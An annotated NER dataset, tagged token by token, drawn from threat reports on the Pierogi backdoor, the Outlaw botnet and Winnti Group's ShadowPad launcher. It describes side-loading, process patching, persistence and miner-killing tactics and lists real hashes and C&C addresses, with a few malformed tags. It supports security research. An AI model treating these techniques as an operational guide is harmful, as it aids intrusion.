+on O +the O +command O +below O +. O + +The O +records O +of O +the O +domains O +and O +IPs O +involved O +in O +this O +campaign O +seem O +to O +show O +that O +the O +attackers O +created O +a O +new O +infrastructure O +specifically O +for O +this O +campaign O +. O + +The O +domains O +were O +registered O +in O +November B-TIME +2019 E-TIME +and O +operationalized O +shortly O +after O +. O + +In O +part O +two O +of O +this O +research O +, O +we O +examined O +the O +Pierogi B-ACT S-MAL I-ACT +campaign E-ACT +. 
O + +Cybereason S-SECTEAM +suspects O +this O + +campaign O +targets O +Palestinian O +individuals O +and O +entities O +in O +the O +Middle B-LOC +East E-LOC +, O +specifically O +directed O +at O + +those O +in O +the O +Palestinian B-IDTY +government E-IDTY +. O + +The O +threat O +actors O +behind O +the O +campaign O +use O +social O +engineering O +to O +infect O +their O +victims O +with O +the O +Pierogi B-MAL +backdoor E-MAL +for O +cyber O +espionage O +purposes O +. O + +The O +threat O +actor O +behind O +the O +attack O +invested O +considerable O +time O +and O +effort O +to O +lure O +their O +victims O +with O +specially-crafted O +documents O +that O +target O +Palestinian O +individuals O +and O +entities O +in O +the O +Middle B-LOC +East E-LOC +. O + +In O +our O +analysis O +, O +we O +reviewed O +the O +TTPs O +and O +the O +decoy O +content O +, O +and O +pointed O +out O +the O +similarities O +between O +previous O +attacks O +that O +have O +been O +attributed O +to O +MoleRATs S-APT +, O +an O +Arabic-speaking O +, O +politically O +motivated O +group O +that O +has O +operated O + +in O +the O +Middle B-LOC +East E-LOC +since O +2012 S-TIME +. O + +The O +Pierogi B-MAL +backdoor E-MAL +discovered O +by O +Cybereason S-SECTEAM +during O +this O +investigation O +seems O +to O +be O +undocumented O +and O +gives O +the O +threat O +actors O +espionage O +capabilities O +over O +their O +victims O +. O + +Based O +on O +the O +Ukranian O +language O +embedded O +in O +the O +backdoor S-MAL +, O +Cybereason S-SECTEAM +raises O +the O +possibility O +that O +the O +backdoor S-MAL +was O +obtained O +in O +underground O +communities O +by O +the O +threat O +actors O +, O +rather O +than O +developed O +in-house O +by O +the O +group O +. O + + +Outlaw S-APT +Updates O +Kit O +to O +Kill O +Older O +Miner O +Versions O +, O +Targets O +More O +Systems O +. 
O + +As O +we O +’ve O +observed O +with O +cybercriminal O +groups O +that O +aim O +to O +maximize O +profits O +for O +every O +campaign O +, O +silence O +does O +n’t O +necessarily O +mean O +inactivity O +. O + +It O +appears O +hacking O +group O +Outlaw S-APT +, O +which O +has O +been O +silent O +for O +the O +past O +few O +months O +, O +was O +simply O +developing O +their O +toolkit O +for O +illicit O +income O +sources O +. O + +While O +they O +have O +been O +quiet O +since O +our O +June O +analysis O +, O +we O +observed O +an O +increase O +in O +the O +group O +’s O +activities O +in O +December S-TIME +, O +with O +updates O +on O +the O +kits O +’ O +capabilities O +reminiscent O +of O +their O +previous O +attacks O +. O + +The O +updates O +expanded O +scanner O +parameters O +and O +targets O +, O +looped O +execution O +of O +files O +via O +error O +messages O +, O +improved O +evasion O +techniques O +for O +scanning O +activities O +, O +and O +improved O +mining O +profits O +by O +killing O +off O +both O +the O +competition O +and O +their O +own O +previous O +miners O +. O + +We O +analyzed O +the O +kits O +, O +which O +were O +designed O +to O +steal O +information O +from O +the O +automotive O +and O +finance O +industries O +, O +launch O +subsequent O +attacks O +on O +already O +compromised O +systems O +, O +and O +( O +possibly O +) O +sell O +stolen O +information O +. O + +Comparing O +this O +development O +to O +their O +previous O +attacks O +, O +we O +think O +Outlaw S-APT +may O +be O +aiming O +to O +go O +after O +enterprises O +that O +have O +yet O +to O +update O +their O +systems O +, O +assessing O +security O +and O +changes O +with O +their O +previously O +infected O +hosts O +, O +finding O +new O +and O +old O +targets O +, O +and O +possibly O +testing O +their O +updates O +in O +the O +wild O +. 
O + +We O +will O +continue O +to O +observe O +the O +group O +’s O +activities O +as O +they O +target O +industries O +from O +the B-LOC +United I-LOC +States E-LOC +and O +Europe S-LOC +. O + +Based O +on O +the O +samples O +we O +collected O +and O +traced O +to O +456 O +distinct O +IPs O +, O +we O +expect O +the O +group O +to O +be O +more O +active O +in O +the O +coming O +months O +as O +we O +observed O +changes O +on O +the O +versions O +we O +acquired O +. O + +These O +new O +samples O +targeted O +Linux- S-OS +and O +Unix-based B-OS +operating I-OS +systems E-OS +, O +vulnerable O +servers O +, O +and O +internet O +of O +things O +( O +IoT O +) O +devices O +by O +exploiting O +known O +vulnerabilities O +with O +available O +exploits O +. O + +This O +time O +, O +the O +group O +explored O +unpatched O +systems O +vulnerable O +to O +CVE-2016-8655 S-VULID +and O +Dirty B-VULNAME +COW E-VULNAME +exploit O +( O +CVE-2016-5195 S-VULID +) O +as O +attack O +vectors O +. O + +Files O +using O +simple O +PHP-based O +web O +shells O +were O +also O +used O +to O +attack O +systems O +with O +weak O +SSH S-PROT +and O +Telnet S-PROT +credentials O +. O + +While O +no O +phishing- O +or O +social O +engineering-initiated O +routines O +were O +observed O +in O +this O +campaign O +, O +we O +found O +multiple O +attacks O +over O +the O +network O +that O +are O +considered O +“ O +loud. O +” O +These O +involved O +large-scale O +scanning O +operations O +of O +IP O +ranges O +intentionally O +launched O +from O +the O +command B-TOOL +and I-TOOL +control E-TOOL +( O +C&C O +) O +server O +. O + +The O +honeynet O +graphs O +, O +which O +show O +activity O +peaks O +associated O +with O +specific O +actions O +, O +also O +suggest O +that O +the O +scans O +were O +timed O +. 
O + +We O +also O +considered O +the O +move O +as O +an O +obfuscation O +technique O +, O +as O +it O +was O +mixed O +with O +a O +lot O +of O +script O +kiddie O +activities O +that O +can O +easily O +be O +mistaken O +for O +grey O +noise O +online O +. O + +The O +attackers O +could O +hide O +their O +activities O +if O +they O +noted O +the O +business O +hours O +of O +the O +intended O +targets O +and O +performed O +the O +actions O +coinciding O +with O +said O +times O +. O + +From O +the O +sample O +we O +analyzed O +, O +attacks O +started O +from O +one O +virtual B-TOOL +private I-TOOL +server E-TOOL +( O +VPS S-TOOL +) O +that O +searches O +for O +a O +vulnerable O +machine O +to O +compromise O +( O +previous O +techniques O +used O +malicious O +URLs O +or O +infecting O +legitimate O +websites O +for O +bot O +propagation O +) O +. O + +Once O +infected O +, O +the O +C&C S-TOOL +commands O +for O +the O +infected O +system O +launches O +a O +loud O +scanning O +activity O +and O +spreads O +the O +botnet O +by O +sending O +a O +“ O +whole O +kit O +” O +of O +binary O +files O +at O +once O +with O +naming O +conventions O +same O +as O +the O +ones O +already O +in O +the O +targeted O +host O +, O +likely O +banking O +on O +breaking O +through O +via O +“ O +security O +through O +obscurity. O +” O +They O +attempted O +to O +evade O +traffic O +inspection O +by O +encoding O +the O +code O +for O +the O +scanner O +with O +base-64 S-ENCR +. O + +The O +zombie O +host O +initiates O +the O +scan O +— O +another O +routine O +from O +previous O +campaigns O +— O +but O +updated O +with O +a O +larger O +set O +of O +parameters O +and O +programmed O +to O +run O +in O +the O +background O +. O + +The O +kit O +we O +found O +is O +in O +tgz O +format O +, O +though O +we O +have O +observed O +some O +samples O +disguised O +as O +png O +or O +jpg O +. 
O + +While O +previous O +routines O +took O +advantage O +of O +competing O +miners O +’ O +activities O +and O +unrelated O +components O +to O +hijack O +the O +profit O +, O +the O +latest O +version O +of O +the O +code O +attempts O +to O +remove O +all O +related O +files O +and O +codes O +from O +previous O +infections O +( O +including O +their O +own O +to O +make O +sure O +the O +running O +components O +are O +updated O +, O +as O +well O +as O +those O +from O +other O +cybercriminals O +to O +maximize O +the O +resources O +of O +the O +zombie O +host O +) O +and O +creates O +a O +new O +working O +directory O +/tmp/.X19-unix O +to O +move O +the O +kit O +and O +extract O +the O +files O +. O + +The O +tsm O +binary O +then O +runs O +in O +the O +background O +, O +forwarding O +a O +series O +of O +error O +messages O +to O +/dev/null O +to O +keep O +the O +code O +running O +, O +ensuring O +the O +continuous O +execution O +of O +the O +code O +referenced O +with O +a O +set O +of O +parameters O +/tmp/up.txt O +. O + +The O +script O +then O +waits O +20 O +minutes O +before O +it O +runs O +the O +wrapper O +script O +initall S-FILE +: O + +2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a S-SHA2 +install S-FILE +. O + +Another O +variant O +executes O +a O +set O +of O +commands O +once O +a O +system O +is O +successfully O +compromised O +. O + +Most O +of O +these O +commands O +are O +related O +to O +gathering O +information O +from O +the O +infected O +machine O +( O +number O +of O +CPU O +cores O +, O +users O +, O +scheduled O +tasks O +, O +running O +processes O +, O +OS O +installed O +, O +and O +CPU O +and O +memory O +information O +) O +via O +the O +dota3 S-TOOL +payload O +, O +as O +well O +as O +changing O +the O +password O +to O +a O +random O +string O +also O +stored O +in O +/tmp/up.txt O +. 
O + +In O +a O +previous O +execution O +( O +published O +in O +June B-TIME +2019 E-TIME +) O +, O +we O +observed O +that O +dota2 S-TOOL +had O +its O +own O +folder O +but O +it O +was O +hardly O +executed O +, O +indicating O +that O +this O +version O +is O +the O +updated O +iteration O +. O + +Running O +the O +script O +removes O +the O +remaining O +files O +and O +scripts O +from O +previous O +attacks O +, O +keeping O +a O +low O +profile O +to O +evade O +detection O +. O + +If O +the O +system O +has O +been O +previously O +infected O +with O +a O +cryptominer O +, O +it O +also O +attempts O +to O +kill O +the O +running O +miner O +and O +all O +its O +related O +activities O +. O + +Based O +on O +a O +bashtemp O +directory O +of O +the O +latest O +sample O +we O +found O +, O +there O +are O +other O +compiled O +ELF S-TOOL +scripts O +, O +named O +init S-FILE +and O +init2 S-FILE +, O +that O +loops O +the O +kit O +to O +keep O +running O +: O + +0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 O + + S-SHA2init S-FILE +. O +93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 O + + S-SHA2init2 S-FILE +. O + +Both O +init S-FILE +and O +init2 S-FILE +scripts O +make O +sure O +all O +other O +running O +mining O +services O +are O +killed O +, O +and O +that O +all O +the O +files O +in O +the O +working O +directory O +are O +executed O +by O +giving O +777 O +permissions O +. O + +We O +also O +found O +the O +init0 S-FILE +script O +running O +; O +the O +script O +cleans O +out O +all O +miners O +regardless O +of O +its O +origin O +. O + +It O +then O +resets O +cron O +and O +removes O +possible O +cache O +files O +from O +other O +programs O +, O +starts O +scripts O +and O +binaries O +a S-FILE +, O +init0 S-FILE +, O +and O +start O +, O +and O +sets O +the O +persistence O +by O +modifying O +the O +crontab O +. 
O + +The O +a O +binary O +is O +a O +script B-TOOL +wrapper E-TOOL +to O +start O +run O +, O +a O +Perl-obfuscated B-TOOL +script E-TOOL +for O +installation O +of O +a O +Shellbot S-MAL +to O +gain O +control O +of O +the O +infected O +system O +. O + +The O +Shellbot S-MAL +disguises O +itself O +as O +a O +process O +named O +rsync O +, O +commonly O +the O +binary O +seen O +on O +many O +Unix- S-OS +and O +Linux-based B-OS +systems E-OS +to O +automatically O +run O +for O +backup O +and O +synchronization O +. O + +This O +allows O +the O +malicious O +activity O +to O +evade O +detection O +. O + +The O +Shellbot S-MAL +script O +is O +added O +to O +run O +after O +the O +victim O +’s O +system O +reboots O +, O +and O +scripts O +/a/upd O +, O +/b/sync/ O +, O +and O +/c/aptitude/ O +are O +added O +to O +the O +crontab O +. O + +However O +, O +while O +we O +observed O +the O +presence O +of O +the O +codes O +, O +the O +functions O +of O +upd O +, O +sync O +and O +aptitude O +were O +disabled O +in O +the O +kits O +’ O +latest O +version O +. O + +It O +remains O +unclear O +whether O +these O +are O +leftover O +code O +from O +the O +previous O +versions O +or O +their O +particular O +purposes O +were O +served O +. O + +Shellbot S-MAL +is O +also O +used O +to O +control O +the O +botnet S-MAL +, O +with O +a O +command O +that O +is O +sent O +and O +run O +from O +the O +C&C S-TOOL +to O +determine O +if O +there O +is O +a O +code O +execution O +in O +the O +shell O +, O +the O +hostname O +, O +and O +its O +architecture O +. O + +All O +results O +and O +system O +information O +collected O +from O +the O +infected O +system O +are O +stored O +locally O +in O +the O +device O +for O +a O +period O +before O +Outlaw S-APT +retrieves O +them O +via O +the O +C&C S-TOOL +. 
O + +We O +also O +found O +traces O +of O +Android B-TOOL +Package I-TOOL +Kits- E-TOOL +( O +APK- S-TOOL +) O +and O +Android B-TOOL +Debug I-TOOL +Bridge E-TOOL +( O +ADB S-TOOL +)-based O +commands O +that O +enable O +cryptocurrency O +mining O +activities O +in O +Android-based B-TOOL +TVs E-TOOL +. O + +Since O +discovering O +the O +operations O +of O +this O +group O +in O +2018 S-TIME +, O +Outlaw S-APT +continues O +to O +use O +scripts O +, O +codes O +, O +and O +commands O +that O +have O +been O +previously O +used O +and O +deployed O +. O + +These O +routines O +are O +indicative O +of O +the O +group O +’s O +aim O +to O +get O +quantitative O +returns O +through O +varied O +cybercriminal O +profit O +streams O +. O + +This O +was O +also O +reinforced O +by O +their O +naming O +conventions O +, O +wherein O +different O +versions O +are O +simply O +named O +after O +the O +code O +iterations O +, O +following O +a O +specific O +format O +regardless O +of O +the O +actual O +function O +of O +the O +code O +. O + +Furthermore O +, O +based O +on O +the O +group O +’s O +use O +of O +dated O +exploits O +as O +vectors O +that O +companies O +would O +have O +likely O +addressed O +with O +monitoring O +and O +regular O +patching O +schedules O +, O +it O +appears O +that O +they O +’re O +going O +after O +enterprises O +who O +have O +yet O +to O +patch O +their O +systems O +, O +as O +well O +as O +companies O +with O +internet-facing O +systems O +with O +weak O +to O +no O +monitoring O +of O +traffic O +and O +activities O +. 
O + +Considering O +the O +amount O +of O +resources O +needed O +to O +deploy O +all O +the O +necessary O +patches O +for O +an O +enterprise O +( O +such O +as O +quality O +testing O +and O +operations O +alignment O +) O +, O +which O +implies O +costly O +downtime O +for O +operations O +and O +the O +hesitation O +to O +update O +all O +systems O +immediately O +, O +Outlaw S-APT +may O +find O +even O +more O +targets O +and O +victims O +for O +their O +updated O +botnets O +every O +time O +there O +is O +a O +patch O +released O +and O +waiting O +to O +be O +downloaded O +. O + +Save O +for O +a O +few O +iteration O +updates O +, O +combinations O +from O +previous O +deployments O +, O +and O +using O +the O +routines O +repetitively O +for O +every O +campaign O +, O +we O +found O +very O +little O +changes O +in O +the O +group O +’s O +toolkit O +, O +which O +allowed O +various O +honeypots S-MAL +across O +the O +Eastern B-LOC +European E-LOC +region O +to O +detect O +many O +of O +the O +sent O +binaries O +. O + +Meanwhile O +, O +the O +group O +uses O +a O +wide O +range O +of O +IP O +addresses O +as O +input O +for O +scanning O +activities O +that O +are O +grouped O +by O +country O +, O +allowing O +them O +to O +attack O +certain O +regions O +or O +areas O +within O +particular O +periods O +of O +the O +year O +, O +as O +previously O +observed O +. O + +We O +think O +the O +group O +has O +likely O +become O +more O +enterprising O +, O +and O +learned O +to O +take O +advantage O +of O +some O +details O +from O +their O +previous O +campaigns O +to O +maximize O +profit O +opportunities O +while O +exerting O +minimal O +effort O +. O + +By O +shaping O +the O +attack O +, O +the O +group O +may O +be O +able O +to O +create O +niches O +in O +the O +underground O +, O +catering O +to O +the O +specific O +needs O +of O +their O +customers O +. 
O + +Also O +aware O +of O +the O +existing O +laws O +in O +Europe S-LOC +, O +they O +can O +avoid O +prosecution O +in O +certain O +countries O +as O +long O +as O +they O +avoid O +attacking O +them O +. O + +Collection O +of O +results O +and O +data O +from O +scanning O +in O +this O +manner O +might O +be O +easier O +to O +sort O +( O +while O +allowing O +them O +to O +stay O +under O +the O +radar O +) O +, O +as O +compared O +to O +getting O +feedback O +from O +zombie O +bots O +deployed O +around O +the O +world O +simultaneously O +. O + +We O +will O +continue O +to O +monitor O +this O +hacking O +group O +’s O +activities O +and O +their O +toolkit O +’s O +developments O +. O + +Outlaw S-APT +’s O +attack O +routines O +may O +not O +be O +new O +, O +but O +it O +still O +serves O +as O +a O +reminder O +for O +enterprises O +to O +update O +their O +systems O +regularly O +. O + +Legacy O +system O +users O +may O +use O +their O +providers O +’ O +virtual O +patches O +. O + +Users O +are O +advised O +to O +close O +unused O +ports O +, O +to O +secure O +ports O +and O +other O +internet-facing O +devices O +that O +are O +regularly O +open O +for O +system O +administrators O +’ O +support O +. O + +Users O +can O +also O +adopt O +a O +multilayered O +security O +solution O +that O +can O +protect O +systems O +from O +the O +gateway O +to O +the O +endpoint O +, O +actively O +blocking O +malicious O +URLs O +by O +employing O +filtering O +, O +behavioral O +analysis O +, O +and O +custom O +sandboxing O +. O + +Users O +can O +consider O +adopting O +security O +solutions O +that O +can O +defend O +against O +malicious O +bot-related O +activities O +such O +as O +Outlaw S-APT +’s O +through O +a O +cross-generational O +blend O +of O +threat O +defense O +techniques O +. 
O + +Trend B-TOOL +Micro™ I-TOOL +XGen™ E-TOOL +security O +provides O +high-fidelity O +machine O +learning O +that O +can O +secure O +the O +gateway O +and O +endpoints O +, O +and O +protect O +physical O +, O +virtual O +, O +and O +cloud O +workloads O +. O + +With O +technologies O +that O +employ O +web/URL O +filtering O +, O +behavioral O +analysis O +, O +and O +custom O +sandboxing O +, O +XGen S-TOOL +security O +offers O +protection O +against O +ever-changing O +threats O +that O +bypass O +traditional O +controls O +and O +exploit O +known O +and O +unknown O +vulnerabilities O +. O + +A O +multi-layered O +connected O +network O +defense O +and O +complete O +visibility O +into O +all O +network O +traffic O +, O +in O +addition O +to O +next-generation B-TOOL +intrusion I-TOOL +prevention I-TOOL +system E-TOOL +( O +NGIPS S-TOOL +) O +, O +can O +help O +organizations O +stay O +a O +step O +ahead O +of O +threats O +that O +could O +compromise O +intangible O +assets O +. O + +XGen S-SECTEAM +security O +also O +powers O +Trend B-IDTY +Micro E-IDTY +’s O +suite O +of O +security O +solutions O +: O +Hybrid O +Cloud O +Security O +and O +User O +Protection O +. O + +Outlaw S-APT +: O +1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa S-SHA2 +Cryptocurrency B-TOOL +miner E-TOOL +Trojan.SH.MALXMR.UWEJP S-MAL +. O + +Outlaw S-APT +: O +b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d S-SHA2 +Shellbot S-MAL +Backdoor.SH.SHELLBOT.AA S-MAL +. O + +Outlaw S-APT +: O +620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 S-SHA2 +Tool O +Trojan.Linux.SSHBRUTE.B S-MAL +. O + +Outlaw S-APT +: O +fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a S-SHA2 +Cryptocurrency B-TOOL +miner E-TOOL +Coinminer.Linux.MALXMR.SMDSL32 S-MAL +. O + +Outlaw S-APT +: O +649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 S-SHA2 +Cryptocurrency B-TOOL +miner E-TOOL +Coinminer.Linux.MALXMR.SMDSL64 S-MAL +. 
O + +Outlaw S-APT +: O +159.203.141.208 S-IP +. O + +Outlaw S-APT +: O +104.236.192.6 S-IP +. O + +Outlaw S-APT +: O +45.9.148.129:80 S-IP +Miner B-TOOL +pool E-TOOL +. O + +Outlaw S-APT +: O +45.9.148.125:80 S-IP +Miner B-TOOL +pool E-TOOL +. O + +Outlaw S-APT +: O +http://www.minpop.com/sk12pack/idents.php S-URL +Command B-TOOL +and I-TOOL +control E-TOOL +. O + +Outlaw S-APT +: O +http://www.minpop.com/sk12pack/names.php S-URL +Command B-TOOL +and I-TOOL +control E-TOOL +. O + + +Winnti B-APT +Group E-APT +targeting O +universities O +in O +Hong B-LOC +Kong E-LOC +. O + +In O +November B-TIME +2019 E-TIME +, O +we O +discovered O +a O +new O +campaign O +run O +by O +the O +Winnti B-APT +Group E-APT +against O +two O +Hong B-LOC +Kong E-LOC +universities O +. O + +We O +found O +a O +new O +variant O +of O +the O +ShadowPad B-MAL +backdoor E-MAL +, O +the O +group O +’s O +flagship O +backdoor S-MAL +, O +deployed O +using O +a O +new O +launcher O +and O +embedding O +numerous O +modules O +. O + +The B-MAL +Winnti I-MAL +malware E-MAL +was O +also O +found O +at O +these O +universities O +a O +few O +weeks O +prior O +to O +ShadowPad S-MAL +. O + +The O +Winnti B-APT +Group E-APT +, O +active O +since O +at B-TIME +least I-TIME +2012 E-TIME +, O +is O +responsible O +for O +for O +high-profile O +supply-chain O +attacks O +against O +the O +video O +game O +and O +software O +industries O +leading O +to O +the O +distribution O +of O +trojanized B-MAL +software E-MAL +( O +such O +as O +CCleaner S-TOOL +, O +ASUS B-TOOL +LiveUpdate E-TOOL +and O +multiple O +video O +games O +) O +that O +is O +then O +used O +to O +compromise O +more O +victims O +. O + +It O +is O +also O +known O +for O +having O +compromised O +various O +targets O +in O +the O +healthcare O +and O +education O +sectors O +. 
O + +ESET S-IDTY +researchers O +recently O +published O +a O +white O +paper O +updating O +our O +understanding O +of O +the O +arsenal O +of O +the O +Winnti B-APT +Group E-APT +, O +following O +a O +blog O +post O +documenting O +a O +supply-chain O +attack O +targeting O +the O +videogame O +industry O +in O +Asia S-LOC +. O + +Additionally O +, O +we O +published O +a O +blog O +post O +on O +a O +new O +backdoor S-MAL +named O +skip-2.0 S-MAL +that O +targets O +Microsoft B-TOOL +SQL I-TOOL +Server E-TOOL +. O + +This O +article O +focuses O +on O +the O +technical O +details O +of O +this O +new O +ShadowPad S-MAL +variant O +. O + +About O +the O +“ O +Winnti B-APT +Group E-APT +” O +naming O +: O + +We O +have O +chosen O +to O +keep O +the O +name O +“ O +Winnti B-APT +Group E-APT +” O +since O +it O +’s O +the O +name O +first O +used O +to O +identify O +it O +, O +in O +2013 S-TIME +, O +by O +Kaspersky S-SECTEAM +. O + +Since O +Winnti S-MAL +is O +also O +a O +malware O +family O +, O +we O +always O +write O +“ O +Winnti B-APT +Group E-APT +” O +when O +we O +refer O +to O +the O +malefactors O +behind O +the O +attacks O +. O + +Since O +2013 S-TIME +, O +it O +has O +been O +demonstrated O +that O +Winnti S-MAL +is O +only O +one O +of O +the O +many O +malware O +families O +used O +by O +the O +Winnti B-APT +Group E-APT +. O + +In O +November B-TIME +2019 E-TIME +, O +ESET S-IDTY +’s O +machine-learning O +engine O +, O +Augur S-TOOL +, O +detected O +a O +malicious O +and O +unique O +sample O +present O +on O +multiple O +computers O +belonging O +to O +two O +Hong B-LOC +Kong E-LOC +universities O +where O +the O +Winnti S-MAL +malware O +had O +already O +been O +found O +at O +the O +end B-TIME +of I-TIME +October E-TIME +. O + +The O +suspicious O +sample O +detected O +by O +Augur S-TOOL +is O +actually O +a O +new O +32-bit O +ShadowPad S-MAL +launcher O +. 
O + +Samples O +from O +both O +ShadowPad S-MAL +and O +Winnti S-MAL +found O +at O +these O +universities O +contain O +campaign O +identifiers O +and O +C&C S-TOOL +URLs O +with O +the O +names O +of O +the O +universities O +, O +which O +indicates O +a O +targeted O +attack O +. O + +In O +addition O +to O +the O +two O +compromised O +universities O +, O +thanks O +to O +the O +C&C S-TOOL +URL O +format O +used O +by O +the O +attackers O +we O +have O +reasons O +to O +think O +that O +at O +least O +three O +additional O +Hong B-LOC +Kong E-LOC +universities O +may O +have O +been O +compromised O +using O +these O +same O +ShadowPad S-MAL +and O +Winnti S-MAL +variants O +. O + +This O +campaign O +of O +the O +Winnti B-APT +Group E-APT +against O +Hong B-LOC +Kong E-LOC +universities O +was O +taking O +place O +in O +the O +context O +of O +Hong B-LOC +Kong E-LOC +facing O +civic O +protests O +that O +started O +in O +June B-TIME +2019 E-TIME +triggered O +by O +an O +extradition O +bill O +. O + +Even O +though O +the O +bill O +was O +withdrawn O +in O +October B-TIME +2019 E-TIME +, O +protests O +continued O +, O +demanding O +full O +democracy O +and O +investigation O +of O +the O +Hong B-LOC +Kong E-LOC +police O +. O + +These O +protests O +gathered O +hundreds O +of O +thousands O +of O +people O +in O +the O +streets O +with O +large O +support O +from O +students O +of O +Hong B-LOC +Kong E-LOC +universities O +, O +leading O +to O +multiple O +university O +campus O +occupations O +by O +the O +protesters O +. O + +We O +have O +contacted O +the O +compromised O +universities O +and O +provided O +the O +necessary O +information O +and O +assistance O +to O +remediate O +the O +compromise O +. O + +Unlike O +previous O +ShadowPad S-MAL +variants O +documented O +in O +our O +white O +paper O +on O +the O +arsenal O +of O +the O +Winnti B-APT +Group E-APT +, O +this O +launcher O +is O +not O +obfuscated O +using O +VMProtect S-TOOL +. 
O + +Furthermore O +, O +the O +encrypted O +payload O +is O +neither O +embedded O +in O +the O +overlay O +nor O +located O +in O +a O +COM1:NULL.dat O +alternate O +data O +stream O +. O + +And O +the O +usual O +RC5 S-ENCR +encryption O +with O +a O +key O +derived O +from O +the O +volume O +ID O +of O +the O +system O +drive O +of O +the O +victim O +machine O +( O +as O +seen O +in O +the O +PortReuse B-MAL +backdoor E-MAL +, O +skip-2.0 S-MAL +and O +some O +ShadowPad S-MAL +variants O +) O +is O +not O +present O +either O +. O + +In O +this O +case O +, O +the O +launcher O +is O +much O +simpler O +. O + +The O +launcher O +is O +a O +32-bit O +DLL S-TOOL +named O +hpqhvsei.dll S-FILE +, O +which O +is O +the O +name O +of O +a O +legitimate O +DLL S-TOOL +loaded O +by O +hpqhvind.exe S-FILE +. O + +This O +executable O +is O +from O +HP S-IDTY +and O +is O +usually O +installed O +with O +their O +printing O +and O +scanning O +software O +called O +“ O +HP B-TOOL +Digital I-TOOL +Imaging E-TOOL +” O +. O + +In O +this O +case O +the O +legitimate O +hpqhvind.exe S-FILE +was O +dropped O +by O +the O +attackers O +, O +along O +with O +their O +malicious O +hpqhvsei.dll S-FILE +, O +in O +C:\Windows\Temp O +. O + +Although O +we O +do O +not O +have O +the O +component O +that O +dropped O +and O +executed O +this O +launcher O +, O +the O +presence O +of O +these O +files O +leads O +us O +to O +think O +that O +the O +initial O +execution O +of O +this O +launcher O +is O +done O +through O +DLL B-TOOL +side-l S-TOOLoading E-TOOL +. O + +When O +the O +malicious O +DLL S-TOOL +is O +loaded O +at O +hpqhvind.exe S-FILE +startup O +, O +its O +DLLMain O +function O +is O +called O +that O +will O +check O +its O +parent O +process O +for O +the O +following O +sequence O +of O +bytes O +at O +offset O +0x10BA O +. 
O + +In O +the O +case O +where O +the O +parent O +process O +is O +hpqhvind.exe S-FILE +, O +this O +sequence O +of O +bytes O +is O +present O +at O +this O +exact O +location O +and O +the O +malicious O +DLL S-TOOL +will O +proceed O +to O +patch O +the O +parent O +process O +in O +memory O +. O + +It O +replaces O +the O +original O +instructions O +at O +0x10BA O +with O +an O +unconditional O +jump O +( O +jmp O +– O +0xE9 O +) O +to O +the O +address O +of O +the O +function O +from O +hpqhvsei.dll S-FILE +that O +decrypts O +and O +executes O +the O +encrypted O +payload O +embedded O +in O +the O +launcher O +. O + +The O +decompiled O +function O +responsible O +for O +patching O +the O +parent O +process O +. O + +In O +case O +hpqhvsei.dll S-FILE +is O +loaded O +by O +a O +different O +process O +than O +hpqhvind.exe S-FILE +, O +the O +malicious O +code O +will O +not O +be O +decrypted O +and O +executed O +. O + +The O +difference O +between O +the O +original O +and O +patched O +hpqhvind.exe S-FILE +. O + +The O +part O +of O +the O +code O +that O +is O +patched O +is O +located O +at O +the O +very O +beginning O +of O +the O +main O +function O +of O +hpqhvind.exe S-FILE +. O + +The O +patched O +code O +is O +located O +right O +after O +the O +load O +of O +hpqhvsei.dll S-FILE +. O + +This O +means O +that O +the O +function O +responsible O +for O +decrypting O +and O +executing O +the O +payload O +is O +executed O +directly O +after O +the O +load O +of O +the O +malicious O +DLL S-TOOL +. O + +The O +encrypted O +payload O +is O +located O +in O +the O +.rdata O +section O +of O +hpqhvsei.dll S-FILE +and O +the O +decryption O +algorithm O +is O +an O +XOR S-ENCR +loop O +where O +the O +XOR S-ENCR +key O +is O +updated O +at O +each O +iteration O +. 
O + +The O +decrypted O +payload O +is O +the O +usual O +shellcode S-TOOL +responsible O +for O +ShadowPad S-MAL +initialization O +( O +obfuscated O +using O +fake O +conditional O +jumps O +to O +hinder O +disassembly O +) O +. O + +After O +having O +been O +decrypted O +, O +ShadowPad S-MAL +’s O +shellcode S-TOOL +is O +executed O +. O + +It O +will O +first O +achieve O +persistence O +on O +the O +system O +by O +writing O +the O +in-memory O +patched O +parent O +process O +to O +disk O +to O +a O +path O +specified O +in O +the O +configuration O +string O +pool O +. O + +In O +the O +case O +we O +examined O +, O +the O +path O +was O +C:\ProgramData\DRM\CLR\CLR.exe S-FILE +. O + +It O +then O +creates O +a O +service O +named O +clr_optimization_v4.0.30229_32 O +, O +which O +is O +responsible O +for O +executing O +CLR.exe S-FILE +. O + +To O +avoid O +suspicion O +, O +this O +service O +name O +, O +as O +well O +as O +the O +executable O +name O +, O +were O +chosen O +to O +look O +similar O +to O +the O +name O +of O +a O +Microsoft B-TOOL +.NET I-TOOL +optimiza S-IDTYtion I-TOOL +Service E-TOOL +. O + +The O +numbering O +on O +each O +arrow O +corresponds O +to O +the O +chronological O +sequence O +of O +events O +. O + +ShadowPad S-MAL +is O +a O +multimodular O +backdoor S-MAL +where O +the O +modules O +are O +referenced O +from O +the O +Root O +module O +with O +a O +circular O +list O +from O +which O +one O +can O +extract O +the O +module O +address O +, O +a O +UNIX S-OS +timestamp O +( O +probably O +embedded O +automatically O +during O +the O +module O +’s O +compilation O +process O +) O +and O +a O +module O +identifier O +. O + +From O +the O +module O +itself O +we O +can O +also O +extract O +the O +name O +the O +developer O +gave O +to O +the O +module O +. 
